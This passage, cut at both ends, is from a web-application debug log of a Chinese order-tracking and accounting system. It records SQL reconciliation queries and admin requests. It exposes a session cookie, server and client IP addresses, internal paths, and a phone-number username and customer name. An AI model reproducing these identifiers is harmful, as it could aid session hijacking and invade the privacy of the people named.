AS outbound__createtime,outbound.updatetime AS outbound__updatetime FROM `ot_outboundandorder` `outboundandorder` LEFT JOIN `ot_orderinfo` `orderinfo` ON `outboundandorder`.`orderinfo_id`=`orderinfo`.`id` LEFT JOIN `ot_productinfo` `productinfo` ON `outboundandorder`.`productinfo_id`=`productinfo`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outboundandorder`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_factorymge` `factorymge` ON `outboundandorder`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_outbound` `outbound` ON `outboundandorder`.`outbound_id`=`outbound`.`id` WHERE `outbound`.`id` = '11824' [ RunTime:0.014439s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=2048,`price`=7.76,`money`=15892.48 WHERE `id` = 27796 [ RunTime:0.005279s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_accountsreceivable` [ RunTime:0.000983s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000337s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (249 , 40 , 53543 , 1484 , 11824 , 27796 , 1 , 2025 , 12 , 14 , '400W-10底壳1.5厚2048个' , 1765702807 , 15892.48 , 11125573.470661) [ RunTime:0.005387s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000445s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (249 , 40 , 53543 , 1484 , 11824 , 27796 , 1 , 2025 , 12 , 14 , '400W-10底壳1.5厚2048个' , 1765702807 , 15892.48 , 11109680.990661) [ RunTime:0.005345s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_ladger` [ RunTime:0.000829s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000270s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (15892.48 , 966893.37891708 , 19847 , 5 , '400W-10底壳1.5厚2048个' , 40 , 14 , 12 , 2025 , 1765702807) [ RunTime:0.007381s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=2048,`price`=2.16,`money`=4423.68 WHERE `id` = 27797 [ RunTime:0.004597s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000505s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (249 , 40 , 53544 , 1153 , 11824 , 27797 , 1 , 2025 , 12 , 14 , '400W-2上盖2048个' , 1765702807 , 4423.68 , 11114104.670661) [ RunTime:0.005163s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000394s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (249 , 40 , 53544 , 1153 , 11824 , 27797 , 1 , 2025 , 12 , 14 , '400W-2上盖2048个' , 1765702807 , 4423.68 , 11109680.990661) [ RunTime:0.006214s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000487s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (4423.68 , 971317.05891708 , 19849 , 5 , '400W-2上盖2048个' , 40 , 14 , 12 , 2025 , 1765702807) [ RunTime:0.004846s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=2048,`price`=0.5,`money`=1024 WHERE `id` = 27798 [ RunTime:0.005003s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000419s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (249 , 40 , 53545 , 1069 , 11824 , 27798 , 1 , 2025 , 12 , 14 , '400W-3散热器12048个' , 1765702807 , 1024 , 11110704.990661) [ RunTime:0.004900s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000432s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (249 , 40 , 53545 , 1069 , 11824 , 27798 , 1 , 2025 , 12 , 14 , '400W-3散热器12048个' , 1765702807 , 1024 , 11109680.990661) [ RunTime:0.004107s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000390s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (1024 , 972341.05891708 , 19851 , 5 , '400W-3散热器12048个' , 40 , 14 , 12 , 2025 , 1765702807) [ RunTime:0.005023s ] [ sql ] [ SQL ] UPDATE `ot_outboundandorder` SET `verify_status`=1,`verify_amount`=4096,`price`=0.04,`money`=163.84 WHERE `id` = 27799 [ RunTime:0.003328s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000483s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `money` , `yu_money`) VALUES (249 , 40 , 53546 , 1022 , 11824 , 27799 , 1 , 2025 , 12 , 14 , '大弯压板4096个' , 1765702807 , 163.84 , 11109844.830661) [ RunTime:0.004867s ] [ sql ] [ SQL ] SELECT * FROM `ot_accountsreceivable` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000554s ] [ sql ] [ SQL ] INSERT INTO `ot_accountsreceivable` (`kehu_id` , `factorymge_id` , `orderinfo_id` , `productinfo_id` , `outbound_id` , `outboundandorder_id` , `subject_type` , `year` , `month` , `day` , `explain` , `createtime` , `reced_money` , `yu_money`) VALUES (249 , 40 , 53546 , 1022 , 11824 , 27799 , 1 , 2025 , 12 , 14 , '大弯压板4096个' , 1765702807 , 163.84 , 11109680.990661) [ RunTime:0.004515s ] [ sql ] [ SQL ] SELECT * FROM `ot_ladger` WHERE `factorymge_id` = 40 ORDER BY `id` DESC LIMIT 1 [ RunTime:0.000378s ] [ sql ] [ SQL ] INSERT INTO `ot_ladger` (`reced_money` , `yu_money` , `rece_id` , `subject_type` , `explain` , `factorymge_id` , `day` , `month` , `year` , `createtime`) VALUES (163.84 , 972504.89891708 , 19853 , 5 , '大弯压板4096个' , 40 , 14 , 12 , 2025 , 1765702807) [ RunTime:0.006745s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_admin_log` [ RunTime:0.000856s ] [ sql ] [ SQL ] INSERT INTO `ot_admin_log` (`title` , `content` , `url` , `admin_id` , `username` , `useragent` , `ip` , `createtime`) VALUES ('跟单系统 财务管理 校对应收账款 核对' , '{\"dialog\":\"1\",\"kehu_id\":[\"\\u5b59\\u5efa\\u519b\",\"249\"],\"verify_amount\":[\"2048\",\"2048\",\"2048\",\"4096\"],\"price\":[\"7.76\",\"2.1600000000\",\"0.5000000000\",\"0.0400000000\"],\"money\":[\"15892.48\",\"4423.6800000000\",\"1024.0000000000\",\"163.8400000000\"],\"explain\":[\"400W-10\\u5e95\\u58f31.5\\u539a2048\\u4e2a\",\"400W-2\\u4e0a\\u76d62048\\u4e2a\",\"400W-3\\u6563\\u70ed\\u566812048\\u4e2a\",\"\\u5927\\u5f2f\\u538b\\u677f4096\\u4e2a\"],\"shoukuan_status-1\":\"1\",\"shoukuan_status-2\":\"1\",\"shoukuan_status-3\":\"1\",\"shoukuan_status-4\":\"1\",\"ids\":\"11824\"}' , '/admin/financial/verifybill/hedui/ids/11824?dialog=1' , 74 , '15233178605' , 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36' , '106.112.204.117' , 1765702807) [ RunTime:0.006680s ] --------------------------------------------------------------- [ 2025-12-14T17:00:07+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970991 [ info ] 47.105.33.115:8081/admin/financial/verifybill/index?sort=id&order=desc&offset=0&limit=10&filter=%7B%22start_time%22%3A%222025-11-14+00%3A00%3A00%22%2C%22end_time%22%3A%222025-12-14+23%3A59%3A59%22%7D&op=%7B%22start_time%22%3A%22%3D%22%2C%22end_time%22%3A%22%3D%22%7D&_=1765701970991 [运行时间:0.242929s][吞吐率:4.12req/s] [内存消耗:5,707.40kb] [文件加载:88] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000035s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001203s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'index', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'application/json, text/javascript, */*; q=0.01', 'x-requested-with' => 'XMLHttpRequest', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'content-type' => 'application/json', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'sort' => 'id', 'order' => 'desc', 'offset' => '0', 'limit' => '10', 'filter' => '{"start_time":"2025-11-14 00:00:00","end_time":"2025-12-14 23:59:59"}', 'op' => '{"start_time":"=","end_time":"="}', '_' => '1765701970991', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001570s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->index[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000121s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000469s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000954s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000470s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000728s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001122s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000871s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000321s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000748s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000646s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000642s ] [ sql ] [ SQL ] SELECT COUNT(*) AS tp_count FROM ( SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount,count(*) FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outboundandorder`.`verify_status` = 0 AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC ) `_group_count_` LIMIT 1 [ RunTime:0.022377s ] [ sql ] [ SQL ] SELECT `outbound`.`id`,`outbound`.`number`,`outbound`.`kehu_id`,`outbound`.`total_money`,`outbound`.`buildstaff_id`,`outbound`.`staffinfo_id`,`outbound`.`factorymge_id`,`outbound`.`complete_status`,`outbound`.`admin_id`,`outbound`.`is_print`,`outbound`.`createtime`,`outbound`.`updatetime`,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,outboundandorder.id AS outboundandorder__id,outboundandorder.outbound_id AS outboundandorder__outbound_id,outboundandorder.orderinfo_id AS outboundandorder__orderinfo_id,outboundandorder.kehu_id AS outboundandorder__kehu_id,outboundandorder.amount AS outboundandorder__amount,outboundandorder.money AS outboundandorder__money,outboundandorder.price AS outboundandorder__price,outboundandorder.productinfo_id AS outboundandorder__productinfo_id,outboundandorder.factorymge_id AS outboundandorder__factorymge_id,outboundandorder.staffinfo_id AS outboundandorder__staffinfo_id,outboundandorder.admin_id AS outboundandorder__admin_id,outboundandorder.createtime AS outboundandorder__createtime,outboundandorder.updatetime AS outboundandorder__updatetime,outboundandorder.verify_status AS outboundandorder__verify_status,outboundandorder.verify_amount AS outboundandorder__verify_amount FROM `ot_outbound` `outbound` LEFT JOIN `ot_factorymge` `factorymge` ON `outbound`.`factorymge_id`=`factorymge`.`id` LEFT JOIN `ot_kehu` `kehu` ON `outbound`.`kehu_id`=`kehu`.`id` LEFT JOIN `ot_outboundandorder` `outboundandorder` ON `outbound`.`id`=`outboundandorder`.`outbound_id` WHERE `outboundandorder`.`verify_status` = 0 AND ( outbound.createtime > 1763049600 ) AND ( outbound.createtime <= 1765727999 ) AND `outbound`.`factorymge_id` = '40' GROUP BY `outbound`.`id` ORDER BY `outbound`.`id` DESC LIMIT 0,10 [ RunTime:0.023585s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11823 [ RunTime:0.014460s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11822 [ RunTime:0.014949s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11821 [ RunTime:0.014899s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11820 [ RunTime:0.014942s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11819 [ RunTime:0.014625s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11814 [ RunTime:0.014447s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11813 [ RunTime:0.014273s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11812 [ RunTime:0.014259s ] [ sql ] [ SQL ] SELECT * FROM `ot_outboundandorder` WHERE `outbound_id` = 11811 [ RunTime:0.014288s ] --------------------------------------------------------------- [ 2025-12-14T17:00:09+08:00 ] 106.112.204.117 GET /admin/financial/verifybill/hedui/ids/11823?dialog=1 [ info ] 47.105.33.115:8081/admin/financial/verifybill/hedui/ids/11823?dialog=1 [运行时间:0.084631s][吞吐率:11.82req/s] [内存消耗:6,632.54kb] [文件加载:89] [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.000041s ] [ info ] [ CACHE ] INIT File [ info ] [ BEHAVIOR ] Run Closure @app_init [ RunTime:0.001138s ] [ info ] [ LANG ] /alidata/www/gendan/thinkphp/lang/zh-cn.php [ info ] [ ROUTE ] array ( 'type' => 'module', 'module' => array ( 0 => 'admin', 1 => 'financial.verifybill', 2 => 'hedui', ), ) [ info ] [ HEADER ] array ( 'host' => '47.105.33.115:8081', 'connection' => 'keep-alive', 'accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', 'upgrade-insecure-requests' => '1', 'user-agent' => 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36', 'referer' => 'http://47.105.33.115:8081/admin/financial/verifybill?addtabs=1', 'accept-encoding' => 'gzip, deflate', 'accept-language' => 'zh-CN', 'cookie' => 'PHPSESSID=24urn8pmghle20960cno2tm5g2', ) [ info ] [ PARAM ] array ( 'dialog' => '1', 'ids' => '11823', ) [ info ] [ LANG ] /alidata/www/gendan/public/../application/admin/lang/zh-cn.php [ info ] [ BEHAVIOR ] Run app\common\behavior\Common @module_init [ RunTime:0.001526s ] [ info ] [ SESSION ] INIT array ( 'id' => '', 'var_session_id' => '', 'prefix' => 'think', 'type' => '', 'auto_start' => true, 'expire' => 2592000, ) [ info ] [ DB ] INIT mysql [ info ] [ RUN ] app\admin\controller\financial\Verifybill->hedui[ /alidata/www/gendan/application/admin/controller/financial/Verifybill.php ] [ info ] [ VIEW ] /alidata/www/gendan/public/../application/admin/view/financial/verifybill/hedui.html [ array ( 0 => 'breadcrumb', 1 => 'site', 2 => 'config', 3 => 'auth', 4 => 'admin', 5 => 'adminid', 6 => 'faccount', 7 => 'shoukuanStatusList', 8 => 'start_time', 9 => 'end_time', 10 => 'total', 11 => 'outbound', 12 => 'rows', ) ] [ info ] [ BEHAVIOR ] Run app\admin\behavior\AdminLog @app_end [ RunTime:0.000109s ] [ info ] [ LOG ] INIT File [ sql ] [ DB ] CONNECT:[ UseTime:0.000490s ] mysql:host=127.0.0.1;dbname=ordertrackce;charset=utf8 [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_group_access` [ RunTime:0.000916s ] [ sql ] [ SQL ] SELECT `aga`.`uid`,`aga`.`group_id`,`ag`.`id`,`ag`.`pid`,`ag`.`name`,`ag`.`rules` FROM `ot_auth_group_access` `aga` LEFT JOIN `ot_auth_group` `ag` ON `aga`.`group_id`=`ag`.`id` WHERE ( aga.uid='74' and ag.status='normal' ) [ RunTime:0.000705s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_auth_rule` [ RunTime:0.000752s ] [ sql ] [ SQL ] SELECT `id`,`pid`,`condition`,`icon`,`name`,`title`,`ismenu` FROM `ot_auth_rule` WHERE `status` = 'normal' AND `id` IN (147,148,149,151,154,155,156,158,160,161,162,164,179,191,197,208,209,210,211,212,213,227,235,290,291,292,293,296,297,298,299,302,307,309,310,311,312,313,314,315,317,319,324,325,326,327,328,329,330,331,332,333,335,336,337,338,339,340,341,342,343,344,351,352,353,354,355,356,357,358,359,146,145,233,153,152,159,178,177,190,196,226,234,289,282,295,301,308,318,132) [ RunTime:0.001131s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_factorymge` [ RunTime:0.000849s ] [ sql ] [ SQL ] SELECT * FROM `ot_factorymge` WHERE `admin_id` = 74 [ RunTime:0.000383s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outboundandorder` [ RunTime:0.000771s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_orderinfo` [ RunTime:0.000926s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_productinfo` [ RunTime:0.000780s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_kehu` [ RunTime:0.000685s ] [ sql ] [ SQL ] SHOW COLUMNS FROM `ot_outbound` [ RunTime:0.000652s ] [ sql ] [ SQL ] SELECT `outboundandorder`.`id`,`outboundandorder`.`outbound_id`,`outboundandorder`.`orderinfo_id`,`outboundandorder`.`kehu_id`,`outboundandorder`.`amount`,`outboundandorder`.`money`,`outboundandorder`.`price`,`outboundandorder`.`productinfo_id`,`outboundandorder`.`factorymge_id`,`outboundandorder`.`staffinfo_id`,`outboundandorder`.`admin_id`,`outboundandorder`.`createtime`,`outboundandorder`.`updatetime`,`outboundandorder`.`verify_status`,`outboundandorder`.`verify_amount`,orderinfo.id AS orderinfo__id,orderinfo.nei_number AS orderinfo__nei_number,orderinfo.number AS orderinfo__number,orderinfo.pid AS orderinfo__pid,orderinfo.order_company AS orderinfo__order_company,orderinfo.order_connect AS orderinfo__order_connect,orderinfo.order_phone AS orderinfo__order_phone,orderinfo.kehu_id AS orderinfo__kehu_id,orderinfo.price AS orderinfo__price,orderinfo.material_id AS orderinfo__material_id,orderinfo.pProductinfo_id AS orderinfo__pProductinfo_id,orderinfo.productinfo_id AS orderinfo__productinfo_id,orderinfo.order_type AS orderinfo__order_type,orderinfo.order_status AS orderinfo__order_status,orderinfo.all_order_status AS orderinfo__all_order_status,orderinfo.shengchan_status AS orderinfo__shengchan_status,orderinfo.zuixinshuoming AS orderinfo__zuixinshuoming,orderinfo.guzhangshu AS orderinfo__guzhangshu,orderinfo.zuixinguzhang AS orderinfo__zuixinguzhang,orderinfo.techprocess_id AS orderinfo__techprocess_id,orderinfo.actual_amount AS orderinfo__actual_amount,orderinfo.kucun_amount AS orderinfo__kucun_amount,orderinfo.produce_amount AS orderinfo__produce_amount,orderinfo.produced_amount AS orderinfo__produced_amount,orderinfo.waste_amount AS orderinfo__waste_amount,orderinfo.produced_time AS orderinfo__produced_time,orderinfo.send_amount AS orderinfo__send_amount,orderinfo.ruku_posi AS orderinfo__ruku_posi,orderinfo.sent_amount AS orderinfo__sent_amount,orderinfo.out_time AS orderinfo__out_time,orderinfo.build_order_staffid AS orderinfo__build_order_staffid,orderinfo.factorymge_id AS orderinfo__factorymge_id,orderinfo.admin_id AS orderinfo__admin_id,orderinfo.remind_day AS orderinfo__remind_day,orderinfo.build_time AS orderinfo__build_time,orderinfo.end_time AS orderinfo__end_time,orderinfo.responsible_staffinfos AS orderinfo__responsible_staffinfos,orderinfo.responsible_staffinfovars AS orderinfo__responsible_staffinfovars,orderinfo.feedback AS orderinfo__feedback,orderinfo.guoqitime AS orderinfo__guoqitime,orderinfo.guoqi_status AS orderinfo__guoqi_status,orderinfo.put_position AS orderinfo__put_position,orderinfo.createtime AS orderinfo__createtime,orderinfo.updatetime AS orderinfo__updatetime,orderinfo.is_modify AS orderinfo__is_modify,orderinfo.purchaseorder_id AS orderinfo__purchaseorder_id,productinfo.id AS productinfo__id,productinfo.product_avatar AS productinfo__product_avatar,productinfo.name AS productinfo__name,productinfo.product_num AS productinfo__product_num,productinfo.kucun AS productinfo__kucun,productinfo.takeup_kucun AS productinfo__takeup_kucun,productinfo.staff_ids AS productinfo__staff_ids,productinfo.staff_names AS productinfo__staff_names,productinfo.pid AS productinfo__pid,productinfo.corresponding_num AS productinfo__corresponding_num,productinfo.position AS productinfo__position,productinfo.price AS productinfo__price,productinfo.factorymge_id AS productinfo__factorymge_id,productinfo.product_status AS productinfo__product_status,productinfo.admin_id AS productinfo__admin_id,productinfo.createtime AS productinfo__createtime,productinfo.updatetime AS productinfo__updatetime,kehu.id AS kehu__id,kehu.name AS kehu__name,kehu.phone1 AS kehu__phone1,kehu.phone2 AS kehu__phone2,kehu.qq AS kehu__qq,kehu.email AS kehu__email,kehu.receiving_address AS kehu__receiving_address,kehu.normalstatus AS kehu__normalstatus,kehu.factorymge_id AS kehu__factorymge_id,kehu.source_fac_id AS kehu__source_fac_id,kehu.admin_id AS kehu__admin_id,kehu.createtime AS kehu__createtime,kehu.updatetime AS kehu__updatetime,factorymge.id AS factorymge__id,factorymge.name AS factorymge__name,factorymge.connect_name AS factorymge__connect_name,factorymge.phone_num AS factorymge__phone_num,factorymge.fax_num AS factorymge__fax_num,factorymge.build_order_yuan AS factorymge__build_order_yuan,factorymge.operator AS factorymge__operator,factorymge.city AS factorymge__city,factorymge.address AS factorymge__address,factorymge.en_switch AS factorymge__en_switch,factorymge.admin_id AS factorymge__admin_id,factorymge.createtime AS factorymge__createtime,factorymge.updatetime AS factorymge__updatetime,outbound.id AS outbound__id,outbound.number AS outbound__number,outbound.kehu_id AS outbound__kehu_id,outbound.total_money AS outbound__total_money,outbound.buildstaff_id AS 